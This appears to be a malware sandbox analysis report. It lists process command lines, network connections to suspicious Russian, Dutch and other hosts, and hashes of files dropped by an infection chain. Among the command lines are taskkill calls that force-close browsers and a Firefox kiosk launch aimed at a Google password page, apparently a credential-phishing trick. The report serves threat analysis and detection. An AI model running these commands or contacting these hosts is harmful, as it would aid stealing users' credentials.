C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM chrome.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM msedge.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM opera.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM brave.exe /T

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1996 -parentBuildID 20240401114208 -prefsHandle 1924 -prefMapHandle 1916 -prefsLen 27352 -prefMapSize 244628 -appDir "C:\Program Files\Mozilla Firefox\browser" - {f471028b-8d0e-4c0d-844c-b7c707138204} 4776 "\\.\pipe\gecko-crash-server-pipe.4776" gpu

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2432 -parentBuildID 20240401114208 -prefsHandle 2424 -prefMapHandle 2412 -prefsLen 28272 -prefMapSize 244628 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {e60a7b15-7d1f-4dc5-98bf-11a5d4d8f05b} 4776 "\\.\pipe\gecko-crash-server-pipe.4776" socket

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3116 -childID 1 -isForBrowser -prefsHandle 3288 -prefMapHandle 3232 -prefsLen 22684 -prefMapSize 244628 -jsInitHandle 1272 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {c65ca5cb-f2ce-4287-9238-a64074ae4de6} 4776 "\\.\pipe\gecko-crash-server-pipe.4776" tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4080 -childID 2 -isForBrowser -prefsHandle 4056 -prefMapHandle 4052 -prefsLen 32762 -prefMapSize 244628 -jsInitHandle 1272 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {5e02e047-153a-4efd-90cd-b8b013d6e537} 4776 "\\.\pipe\gecko-crash-server-pipe.4776" tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4952 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4928 -prefMapHandle 4912 -prefsLen 32762 -prefMapSize 244628 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {9a84c741-04d9-457f-8ef3-68323687c6a2} 4776 "\\.\pipe\gecko-crash-server-pipe.4776" utility

C:\Users\Admin\AppData\Local\Temp\10110580101\299f9f82e8.exe

"C:\Users\Admin\AppData\Local\Temp\10110580101\299f9f82e8.exe"

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4928 -childID 3 -isForBrowser -prefsHandle 5244 -prefMapHandle 5248 -prefsLen 27083 -prefMapSize 244628 -jsInitHandle 1272 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {44683e53-4e36-41cc-9d3a-d55400203641} 4776 "\\.\pipe\gecko-crash-server-pipe.4776" tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5352 -childID 4 -isForBrowser -prefsHandle 5396 -prefMapHandle 5404 -prefsLen 27083 -prefMapSize 244628 -jsInitHandle 1272 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {afcb5a54-ddfa-4fca-b3ae-fda6b1b10b1c} 4776 "\\.\pipe\gecko-crash-server-pipe.4776" tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5584 -childID 5 -isForBrowser -prefsHandle 5540 -prefMapHandle 5380 -prefsLen 27083 -prefMapSize 244628 -jsInitHandle 1272 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {5f4c1057-c3e5-47cd-bad4-f599bf770f88} 4776 "\\.\pipe\gecko-crash-server-pipe.4776" tab

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe

Network

Country Destination Domain Proto
RU 185.215.113.16:80 185.215.113.16 tcp
US 8.8.8.8:53 g.bing.com udp
US 150.171.28.10:443 g.bing.com tcp
RU 176.113.115.6:80 176.113.115.6 tcp
RU 176.113.115.7:80 176.113.115.7 tcp
RU 176.113.115.7:80 176.113.115.7 tcp
US 8.8.8.8:53 exarthynature.run udp
US 104.21.16.1:443 exarthynature.run tcp
US 104.21.16.1:443 exarthynature.run tcp
US 104.21.16.1:443 exarthynature.run tcp
US 104.21.16.1:443 exarthynature.run tcp
US 104.21.16.1:443 exarthynature.run tcp
US 104.21.16.1:443 exarthynature.run tcp
NL 185.156.73.73:80 185.156.73.73 tcp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 dawtastream.bet udp
US 8.8.8.8:53 foresctwhispers.top udp
US 8.8.8.8:53 tracnquilforest.life udp
US 8.8.8.8:53 collapimga.fun udp
US 8.8.8.8:53 seizedsentec.online udp
US 8.8.8.8:53 strawpeasaen.fun udp
US 8.8.8.8:53 quietswtreams.life udp
US 8.8.8.8:53 starrynsightsky.icu udp
US 8.8.8.8:53 earthsymphzony.today udp
US 8.8.8.8:53 steamcommunity.com udp
GB 23.214.143.155:443 steamcommunity.com tcp
US 8.8.8.8:53 farmingtzricks.top udp
US 172.67.220.226:443 farmingtzricks.top tcp
US 172.67.220.226:443 farmingtzricks.top tcp
US 172.67.220.226:443 farmingtzricks.top tcp
US 172.67.220.226:443 farmingtzricks.top tcp
US 172.67.220.226:443 farmingtzricks.top tcp
US 172.67.220.226:443 farmingtzricks.top tcp
NL 185.156.73.73:80 185.156.73.73 tcp
RU 176.113.115.7:80 176.113.115.7 tcp
RU 45.93.20.28:80 45.93.20.28 tcp
US 8.8.8.8:53 youtube.com udp
GB 142.250.187.206:443 youtube.com tcp
US 8.8.8.8:53 youtube.com udp
GB 142.250.187.206:443 youtube.com tcp
US 8.8.8.8:53 youtube.com udp
US 8.8.8.8:53 spocs.getpocket.com udp
US 8.8.8.8:53 firefox-api-proxy.cdn.mozilla.net udp
US 34.117.188.166:443 spocs.getpocket.com udp
US 34.149.97.1:443 firefox-api-proxy.cdn.mozilla.net udp
US 8.8.8.8:53 prod.ads.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net udp
US 8.8.8.8:53 prod.content-signature-chains.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 prod.ads.prod.webservices.mozgcp.net udp
GB 142.250.187.206:443 youtube.com udp
US 8.8.8.8:53 www.youtube.com udp
US 8.8.8.8:53 firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net udp
GB 142.250.200.46:443 www.youtube.com tcp
US 8.8.8.8:53 youtube-ui.l.google.com udp
US 8.8.8.8:53 prod.content-signature-chains.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 shavar.prod.mozaws.net udp
US 8.8.8.8:53 youtube-ui.l.google.com udp
US 8.8.8.8:53 shavar.prod.mozaws.net udp
N/A 127.0.0.1:60556 tcp
US 8.8.8.8:53 prod.remote-settings.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 prod.remote-settings.prod.webservices.mozgcp.net udp
GB 142.250.200.46:443 youtube-ui.l.google.com udp
US 8.8.8.8:53 consent.youtube.com udp
GB 216.58.213.14:443 consent.youtube.com tcp
US 8.8.8.8:53 consent.youtube.com udp
US 8.8.8.8:53 consent.youtube.com udp
GB 216.58.213.14:443 consent.youtube.com udp
US 8.8.8.8:53 tracking-protection.cdn.mozilla.net udp
US 34.120.158.37:443 tracking-protection.cdn.mozilla.net tcp
US 8.8.8.8:53 tracking-protection.prod.mozaws.net udp
US 8.8.8.8:53 tracking-protection.prod.mozaws.net udp
US 8.8.8.8:53 tracking-protection.cdn.mozilla.net udp
US 34.120.158.37:443 tracking-protection.cdn.mozilla.net tcp
US 8.8.8.8:53 www.google.com udp
US 34.120.158.37:443 tracking-protection.cdn.mozilla.net tcp
GB 216.58.204.68:443 www.google.com tcp
US 8.8.8.8:53 www.google.com udp
US 8.8.8.8:53 www.google.com udp
GB 216.58.204.68:443 www.google.com udp
US 34.120.158.37:443 tracking-protection.cdn.mozilla.net tcp
US 34.120.158.37:443 tracking-protection.cdn.mozilla.net tcp
US 34.120.158.37:443 tracking-protection.cdn.mozilla.net tcp
US 34.120.158.37:443 tracking-protection.cdn.mozilla.net tcp
US 34.120.158.37:443 tracking-protection.cdn.mozilla.net tcp
US 34.120.158.37:443 tracking-protection.cdn.mozilla.net tcp
US 34.120.158.37:443 tracking-protection.cdn.mozilla.net tcp
US 34.120.158.37:443 tracking-protection.cdn.mozilla.net tcp
US 34.120.158.37:443 tracking-protection.cdn.mozilla.net tcp
US 34.120.158.37:443 tracking-protection.cdn.mozilla.net tcp
N/A 127.0.0.1:60565 tcp
US 8.8.8.8:53 prod.balrog.prod.cloudops.mozgcp.net udp
US 8.8.8.8:53 prod.balrog.prod.cloudops.mozgcp.net udp
US 8.8.8.8:53 ciscobinary.openh264.org udp
NL 2.18.121.79:80 ciscobinary.openh264.org tcp
US 8.8.8.8:53 a19.dscg10.akamai.net udp
US 8.8.8.8:53 a19.dscg10.akamai.net udp
US 8.8.8.8:53 redirector.gvt1.com udp
GB 172.217.16.238:443 redirector.gvt1.com tcp
US 8.8.8.8:53 redirector.gvt1.com udp
US 8.8.8.8:53 redirector.gvt1.com udp
GB 172.217.16.238:443 redirector.gvt1.com udp
US 8.8.8.8:53 r2---sn-aigl6ns6.gvt1.com udp
GB 74.125.105.7:443 r2---sn-aigl6ns6.gvt1.com tcp
US 8.8.8.8:53 r2.sn-aigl6ns6.gvt1.com udp
US 8.8.8.8:53 r2.sn-aigl6ns6.gvt1.com udp
GB 74.125.105.7:443 r2.sn-aigl6ns6.gvt1.com udp
US 8.8.8.8:53 firefox-settings-attachments.cdn.mozilla.net udp
US 34.107.152.202:443 firefox-settings-attachments.cdn.mozilla.net tcp
US 34.107.152.202:443 firefox-settings-attachments.cdn.mozilla.net tcp
US 34.107.152.202:443 firefox-settings-attachments.cdn.mozilla.net tcp
US 34.107.152.202:443 firefox-settings-attachments.cdn.mozilla.net tcp
US 34.107.152.202:443 firefox-settings-attachments.cdn.mozilla.net tcp
US 34.107.152.202:443 firefox-settings-attachments.cdn.mozilla.net tcp
US 8.8.8.8:53 attachments.prod.remote-settings.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 attachments.prod.remote-settings.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 location.services.mozilla.com udp
US 35.190.72.216:443 location.services.mozilla.com udp
US 8.8.8.8:53 prod.classify-client.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 prod.classify-client.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 play.google.com udp
GB 142.250.200.14:443 play.google.com tcp
US 8.8.8.8:53 play.google.com udp
US 8.8.8.8:53 play.google.com udp
GB 142.250.200.14:443 play.google.com udp
GB 216.58.213.14:443 consent.youtube.com udp

Files

C:\Users\Admin\AppData\Local\Temp\jfXTS3uY9.hta

MD5 4e701582cd99c1553aa60dccfd9d98dd
SHA1 30bdcc5da83588b5607a8e44300e26d61a9e4d94
SHA256 ef0c98f3a26c461d88247989f55403d5837a8569893338df2f0d9fa442b3053d
SHA512 de9512e80a396223824eabb06839a486f6009c1f676a07b7669d2fe91ff6c4e00f98e0fc7b34d97ee63964ad9aab8a1d258173ce3ecb714feb981082c40c8880

memory/3420-2-0x00000000022F0000-0x0000000002326000-memory.dmp

memory/3420-3-0x0000000004EB0000-0x00000000054D8000-memory.dmp

memory/3420-4-0x0000000004D70000-0x0000000004D92000-memory.dmp

memory/3420-6-0x00000000055F0000-0x0000000005656000-memory.dmp

memory/3420-5-0x0000000005580000-0x00000000055E6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_kyqboxv4.eoa.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3420-16-0x0000000005760000-0x0000000005AB4000-memory.dmp

memory/3420-17-0x0000000005C20000-0x0000000005C3E000-memory.dmp

memory/3420-18-0x0000000005C70000-0x0000000005CBC000-memory.dmp

memory/3420-19-0x0000000007360000-0x00000000079DA000-memory.dmp

memory/3420-20-0x0000000006170000-0x000000000618A000-memory.dmp

memory/3420-22-0x00000000070C0000-0x0000000007156000-memory.dmp

memory/3420-23-0x0000000007060000-0x0000000007082000-memory.dmp

memory/3420-24-0x0000000007F90000-0x0000000008534000-memory.dmp

C:\Users\Admin\AppData\Local\TempGSNZAJHBXV0OYOZDWYCV7MAZRJJBODQS.EXE

MD5 93da4bdbae52d91d32a34c140466e8cf
SHA1 2177f234160ef77058d2237a8f97c1d663647240
SHA256 878228e580cd27a72a847922f9b16b7d16d0797c68aa9e6642ae3da13518de7a
SHA512 14d14d6d8d436953ed43483b8b3ba30a4f1df73eb2eca055c047bb0b7e328150ae0c49122a657f5f8ab752872e5d40b791e793675110df5c90440077f446b91a

memory/928-32-0x0000000000F40000-0x0000000001402000-memory.dmp

memory/984-48-0x0000000000BA0000-0x0000000001062000-memory.dmp

memory/928-47-0x0000000000F40000-0x0000000001402000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10110510101\d8c76c7b0b.exe

MD5 7ebfd3c200d1cef79141205b2232d04e
SHA1 9507b4780dc90ac98995ab6987cb76cc3e85cf3d
SHA256 ee097a32ba863725396bd41b54d0dc023d1a15e7e619cd009e93047e4c95be38
SHA512 17cae57fb8194b470e8abc3a5072b2f63a119e10dfc6b44456123f4493632b01bb1e80d15121f63f0dc48c5050c90109c1d17c6ffccd470c11d1e8f36874b73f

memory/984-62-0x0000000000BA0000-0x0000000001062000-memory.dmp

memory/984-63-0x0000000000BA0000-0x0000000001062000-memory.dmp

memory/4480-65-0x0000000000550000-0x0000000000F37000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10110520101\78de00ab05.exe

MD5 c83ea72877981be2d651f27b0b56efec
SHA1 8d79c3cd3d04165b5cd5c43d6f628359940709a7
SHA256 13783c2615668fba4a503cbefdc18f8bc3d10d311d8dfe12f8f89868ed520482
SHA512 d212c563fdce1092d6d29e03928f142807c465ecaaead4fe9d8949b6f36184b8d067a830361559d59fc00d3bbe88feda03d67b549d54f0ec268e9e75698c1dd0

memory/2900-83-0x00000000006A0000-0x0000000000718000-memory.dmp

memory/2016-87-0x0000000000400000-0x0000000000465000-memory.dmp

memory/2016-85-0x0000000000400000-0x0000000000465000-memory.dmp

memory/772-89-0x0000000000BA0000-0x0000000001062000-memory.dmp

memory/772-91-0x0000000000BA0000-0x0000000001062000-memory.dmp

memory/4480-92-0x0000000000550000-0x0000000000F37000-memory.dmp

memory/984-93-0x0000000000BA0000-0x0000000001062000-memory.dmp

memory/4480-94-0x0000000000550000-0x0000000000F37000-memory.dmp

memory/2556-95-0x0000000000400000-0x000000000042F000-memory.dmp

memory/2556-97-0x0000000000400000-0x000000000042F000-memory.dmp

memory/4480-98-0x0000000000550000-0x0000000000F37000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10110530101\3aae3cdde2.exe

MD5 cc1a40ae718a316ece1fa40898297c32
SHA1 1400b072dffc6b9300e48b35bbb8f9f9a93ae357
SHA256 0f00394667da2e8756cbc43b414f053e2923b77198e7972710a4f643d3d9437c
SHA512 af551538724552dc4699a82c8324c83c17187b13afa716de359e891ff2d66f9a5a00de817dc73294d635a2c71a49ee3374f91eae40c9730ec776c8c1907bd5bd

memory/2936-113-0x00000000007D0000-0x0000000001400000-memory.dmp

memory/2556-117-0x0000000010000000-0x000000001001C000-memory.dmp

memory/984-122-0x0000000000BA0000-0x0000000001062000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\IPTE5OF1\service[1].htm

MD5 cfcd208495d565ef66e7dff9f98764da
SHA1 b6589fc6ab0dc82cf12099d1c2d40ab994e8410c
SHA256 5feceb66ffc86f38d952786c6d696c79c2dbc239dd4e91b46729d73a27fb57e9
SHA512 31bca02094eb78126a517b206a88c73cfa9ec6f704c7030d18212cace820f025f00bf0ea68dbf3f3a5436ca63b53bf7bf80ad8d5de7d8359d0b7fed9dbc3ab99

C:\Users\Admin\AppData\Local\Temp\10110540101\a84d3ad71d.exe

MD5 ecbd88e7bb854e4ce89e94f5e76d0116
SHA1 2a2415f6db7d9bf6ec445cadd57d0ef7cd8e66fd
SHA256 c2dbaaa27274e1b7eab4c2d13dff48715ae8afc54201b2d469f6fca8364f5684
SHA512 cf477fdd53d86ffa90d5529f80fb4f70dac75b5c486ffca7a2be614a6be93de21a293ad24a7ccb3cf8729dcebd64105c25b4cf2db1a0704a7ef36bb1a52a3020

memory/3584-139-0x0000000000540000-0x00000000009E8000-memory.dmp

memory/2936-140-0x00000000007D0000-0x0000000001400000-memory.dmp

memory/2936-163-0x00000000007D0000-0x0000000001400000-memory.dmp

memory/1432-177-0x0000000000440000-0x000000000046F000-memory.dmp

memory/1432-182-0x0000000000440000-0x000000000046F000-memory.dmp

memory/2936-183-0x00000000007D0000-0x0000000001400000-memory.dmp

memory/3584-185-0x0000000000540000-0x00000000009E8000-memory.dmp

memory/984-194-0x0000000000BA0000-0x0000000001062000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10110550101\eb8bc5e18e.exe

MD5 ec5b5dbeee457eade1319136d786850b
SHA1 0e6a0d30c3048a511e7d90c4759af1f11384692c
SHA256 d5ecff66c02169361b784ecab66f17ca6ebb39e1064c584ed1a77408f3e50b62
SHA512 593e884fd85ef3fddc8578ba6568062e764093ab6281c248c33ffa76e9fd448ee3690942f67d8523ba222f78b1ed9a063aed935c1f55e5fc60a13fb5d8561339

C:\Users\Admin\AppData\Local\Temp\10110560101\563315ef27.exe

MD5 629300ff81436181f8f475448ae88ccc
SHA1 26d771f0ec5f24c737708a0006d17d2d41b43459
SHA256 9e33286f53f3ce4b98cb00dca5c365c82a0c1ded9ef0402d7d4270a607c127e6
SHA512 467559eb2ada21818816f4713501ee944694875b57ccd721d92b5507f6fcaf1020ffcb1bbc5f41264f6d777701a1e4607ae06277d74fc4e1e0d4477b5b433da0

memory/3044-229-0x0000000000950000-0x0000000000FE9000-memory.dmp

memory/3044-231-0x0000000000950000-0x0000000000FE9000-memory.dmp

memory/984-233-0x0000000000BA0000-0x0000000001062000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10110570101\cb0c0b51c3.exe

MD5 de9fdda5de6c4dfaffb86be4ee98d70a
SHA1 c0c4a6ae8003f5508c92c8bbb037c49fff06a5c3
SHA256 952b6fb34399b787bae14c027165482d38c5355e16d6f1d9f84fa62e6c7c6c92
SHA512 74e44c48e92b0f4ad763dbed41b9252072e0ad27dfef651460fd1500fdfc11ef164853aabb056a71b0d4df01975efd8bfd111565a80ad79b441ab544b1c14592

C:\Users\Admin\AppData\Local\Temp\10110580101\299f9f82e8.exe

MD5 8564841b483e528b91605c2be1b8ccf5
SHA1 5f46911b3c1cb8199f13d0110ebd6d76232a6cc4
SHA256 eed57746d76ad12b0bb7f4f4797c2929c71c58bdf953caa41b1464b925642ce2
SHA512 480eb504430e3156f5e3be7ec724e187fb8c214d0ff306d5af99904414a17a648cfd345f100c9a6d31e6e18c695f1b8647b3c05961e8296bcb2aa9a548a65484

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\1tx1xrpd.default-release\datareporting\glean\pending_pings\326254d2-556d-42f7-a818-c2d006b4bc2f

MD5 9ecda4bcedb75d4477b4ebe4cf57fd50
SHA1 2536668c721e978b657f94b8d1d07e2688a05b6a
SHA256 3273f2deba9f35f89517ca972979b963120b43e24a919c1e245c916937c75170
SHA512 4d3a4d8025b4fe3585b505623f28754a904a0e1aebcaf76f900e30fe258342e5036d266199da8ab76d55282489edafb329c69218bd7306d83a2149806305ef1b

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\1tx1xrpd.default-release\datareporting\glean\pending_pings\b2e3645d-9841-4288-8926-32b248fbdfc5

MD5 60d6bb06f2239570fb2c6be8ef27e529
SHA1 a3f1545609d275d3b621bac4e78df17af4acb0cd
SHA256 26f179e62ba3927f2ab51ccbed5e0a3eee744159ea8da24d1a7c1b71428b5775
SHA512 54616ccde59820f4985e7de1564198c6a295989c76da12129d456ed636404031cec8a3faadf5bbf0f1119003e814c0206e8c83c7418b6a77cd1d05cc83acc0b7

memory/5624-499-0x0000000000CB0000-0x0000000001120000-memory.dmp

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\1tx1xrpd.default-release\datareporting\glean\db\data.safe.tmp

MD5 189d6a8d8fc3de232f582fa506a67f4c
SHA1 d81ff8c5f86e7602b699f8be8259ac10a5504043
SHA256 07ad29eae1fb3a4858eb5f19f46994c29415899b5bf5fe1279407d17eda59aef
SHA512 a08bf1c4d584cdcacf810ea917098ce37d30144dbff83c0182b5d58d3f5bf9bf75a980e491e2df48bc37f325075128d5d3f8f06e8f795aec176ad39f5b7bd214

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\1tx1xrpd.default-release\datareporting\glean\pending_pings\8b2cb0da-e4ce-4ce7-a6d3-dd58971d512a

MD5 518eb2b9c9860a34ec53e39a01423ae4
SHA1 da3f10ba7866b172b8cbc0358e58bb69dca2a2ac
SHA256 648038a2d087d40e019c7efbb6a6ccde079a045f0b2d93bf03de069311bbccb4
SHA512 9d653362d235b6cab6eb960d4f1977055a25f5bac27749b16419f8e0e7fb405afd19195764d950149d6dfe084ad2b1720b429ae95ba4ab7b5ebb84db9bc09d10

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\1tx1xrpd.default-release\datareporting\glean\db\data.safe.tmp

MD5 87449ff0d108552ed663f402e5e4dc95
SHA1 3ad7695a8dc79ecc17c7085479e4d38257d9c19b
SHA256 223a65beffb7cc3f80897a652cc494722d1caac04ade3a6e3fbee4bde0754250
SHA512 1da36b3498b6e00776aa58b96cc9c9a2605c5dbf5165dd995151d50bccbf0bd08ac587a3a059b888b69a5bdbac3bf627c2cfaddfd1d31c6c5abee1f17ad239d7

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\1tx1xrpd.default-release\activity-stream.discovery_stream.json

MD5 4a49051c1914633ce83836ecc8956b4e
SHA1 9e25150168216dcc924242c2db31653165846b7e
SHA256 1624898a74941700ec9a09972b7f1ae607105fb6cc393846ba29963bc7a2fd19
SHA512 e953575d73b413fb2fb568b217e4ee5f565e7c238e767ecf5e07fdbddc5bf78a1d71970fb39fae23f86c5e635cf0de18169c5ca2ed0081ee830665c0b3ee83fb

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\1tx1xrpd.default-release\AlternateServices.bin

MD5 7b9194844289ccc315e4eb1e6e0244a7
SHA1 908c3356df0eb71cdccc9465ec29d4a8992b4669
SHA256 9ffacb3e098c9f0f65afa2e90e6f7feeb18aa40aaa801f66eb3709aed1832016
SHA512 9be58d83b8a4539f8db2c47d2c79d507a5db935ed4d2b3a69a37d1813fac0b7f0178ceea77e4d220c2b4db8901b35cedfdaca260b13fb70c7b0f8d6ef64062ca

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\1tx1xrpd.default-release\datareporting\glean\db\data.safe.tmp

MD5 89cb8e8b0f29afeef20d46d627684784
SHA1 929876fc7b746e46472eb35bfb1e663d5cafef9a
SHA256 71e60edd60e5a9072ab01d3d11b6198a1247b4280d4ba61984f862d4d2be03c7
SHA512 70d46d4ffd8cc1e7f522e855d810c9af7b45acb445d4460f6be77016bd72ad5d2aaf1580ccac7d77581c1003a1a61923902b12124fde198f65206086c593758b

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\1tx1xrpd.default-release\prefs.js

MD5 f69129fa6e21da91d2a81ff8823d0231
SHA1 45ede2673ba843acd3309315f6eb4b09989a2fca
SHA256 275554a12321eaecd0149b6a946b7c32956223c03cb7a010a0c7fa4683f1a8ee
SHA512 1d5fe06f69ba5f08f344c718e0e175c9c17ce09de00669630e5a5682e42579c65b823bad71729b251578197dd19949d3aeaa6afdfba9682d3b0dac1add757763

memory/5624-588-0x0000000000CB0000-0x0000000001120000-memory.dmp

memory/5624-580-0x0000000000CB0000-0x0000000001120000-memory.dmp

memory/984-613-0x0000000000BA0000-0x0000000001062000-memory.dmp

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\1tx1xrpd.default-release\prefs.js

MD5 4874f06decaf2e1b7508f4ccd5f3d5ba
SHA1 4e4d48e8271c1ce9b0ffae5411a9e0bbdc28f139
SHA256 829a4a7d57389530925afbc4f65338b3b45623844082791a0b9d498145c966fd
SHA512 78f153a492f87495df737609fea616870c0b9f0c2e6e9821e9cf8b5d90998c83e27466efeb9a9a2f66f31c78be0e6542c924090a94fca3af5b4a23a2518886ee

C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\IPTE5OF1\soft[1]

MD5 f49d1aaae28b92052e997480c504aa3b
SHA1 a422f6403847405cee6068f3394bb151d8591fb5
SHA256 81e31780a5f2078284b011c720261797eb8dd85e1b95a657dbce7ac31e9df1f0
SHA512 41f715eea031fd8d7d3a22d88e0199277db2f86be73f830819288c0f0665e81a314be6d356fdc66069cb3f2abf0dd02aaa49ac3732f3f44a533fcec0dfd6f773

C:\Users\Admin\Desktop\YCL.lnk

MD5 7d823cfccec530f4b99d2d7de99876c2
SHA1 c0ee9c44ed3b6cffc0923139fb311716be2e84e0
SHA256 149a85238d404a6b84a77213dfd01a3811d6b2fe91959a7c444037c88203edec
SHA512 637f936d82db378a901b4f896e2dfdeddee836d98b0fe9dcc38c16c382441c9f34fd09fea799fe44624021068b531cd8a518286a9934ed1786568f0b3e6c06df

memory/5624-665-0x0000000000CB0000-0x0000000001120000-memory.dmp

memory/5624-674-0x0000000000CB0000-0x0000000001120000-memory.dmp

memory/984-675-0x0000000000BA0000-0x0000000001062000-memory.dmp

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\1tx1xrpd.default-release\datareporting\glean\db\data.safe.tmp

MD5 3935a21b6e1a3295e1ba457908701d64
SHA1 5a48fd17e6fd6cffa139a395dd38182f6971e4c2
SHA256 c68ebc6b0cf81b5e367fbca67be38597852e41d10fb8f3573984af8a61709960
SHA512 4bbce353b2b3358136f0798825f01a0411e00639d23e0385a884a6eb36048f6ab60a455277a15a8ac87209769e24bafd323a38675b0766196aadd1248410160b

memory/3664-695-0x0000000000BA0000-0x0000000001062000-memory.dmp

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\1tx1xrpd.default-release\prefs.js

MD5 fd48a8ad9553e0274c24d79df27c05a6
SHA1 b0642747b04b4dadfc5f651728c7c4143e1e9b60
SHA256 719c37a7098ac3ccf37999c3f06effb828854a8452ebe2f80693a44f0199169a
SHA512 233875755d996ec91543c7c0d7af9073c8268f74d474d9eca6abe4e4aae22b4a3b3f3e8aae6873e9c24c8e57465651f2bbdd686702404dd519433f55bdcb47f3

memory/3664-710-0x0000000000BA0000-0x0000000001062000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\tmpaddon

MD5 09372174e83dbbf696ee732fd2e875bb
SHA1 ba360186ba650a769f9303f48b7200fb5eaccee1
SHA256 c32efac42faf4b9878fb8917c5e71d89ff40de580c4f52f62e11c6cfab55167f
SHA512 b667086ed49579592d435df2b486fe30ba1b62ddd169f19e700cd079239747dd3e20058c285fa9c10a533e34f22b5198ed9b1f92ae560a3067f3e3feacc724f1

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\1tx1xrpd.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.info

MD5 2a461e9eb87fd1955cea740a3444ee7a
SHA1 b10755914c713f5a4677494dbe8a686ed458c3c5
SHA256 4107f76ba1d9424555f4e8ea0acef69357dfff89dfa5f0ec72aa4f2d489b17bc
SHA512 34f73f7bf69d7674907f190f257516e3956f825e35a2f03d58201a5a630310b45df393f2b39669f9369d1ac990505a4b6849a0d34e8c136e1402143b6cedf2d3

